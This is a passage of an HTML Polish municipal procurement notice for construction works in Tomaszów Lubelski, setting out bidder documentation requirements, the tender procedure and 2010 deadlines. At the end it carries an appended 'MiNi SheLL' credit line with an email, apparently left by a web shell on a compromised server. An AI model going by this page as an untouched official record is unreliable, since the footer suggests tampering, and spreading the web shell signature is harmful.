d)  jeżeli wykonawca, wykazując spełnienie warunku, o którym mowa w art. 22, ust. 1, pkt. 4 ustawy (dot. sytuacji ekonomicznej i finansowej) polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26, ust. 2b ustawy Pzp, wymaga przedłożenia informacji z banku, jak w pkt. 5.5.lit. a i b  SIWZ, dotyczącej tych podmiotów,
e)  opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Warunek ten Zamawiający uzna za spełniony, jeżeli wykonawca składający ofertę jako firma lub osoba fizyczna udokumentuje posiadanie  wymienionych wyżej środków finansowych na koncie w banku i przedstawi w ofercie poświadczone ksero żądanej polisy. Ocena spełnienia  
warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-lubelski.pl/infpub/przetargi.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Tomaszowie Lubelskim, Wydział Inwestycji, Rozwoju i Gospodarki Komunalnej, ul. Lwowska 57;  22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2010 godzina 11:00, miejsce: Urząd Miasta w Tomaszowie Lubelskim, ul. Lwowska 57;  22-600 Tomaszów Lubelski, Sekretariat Burmistrza, pokój Nr 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com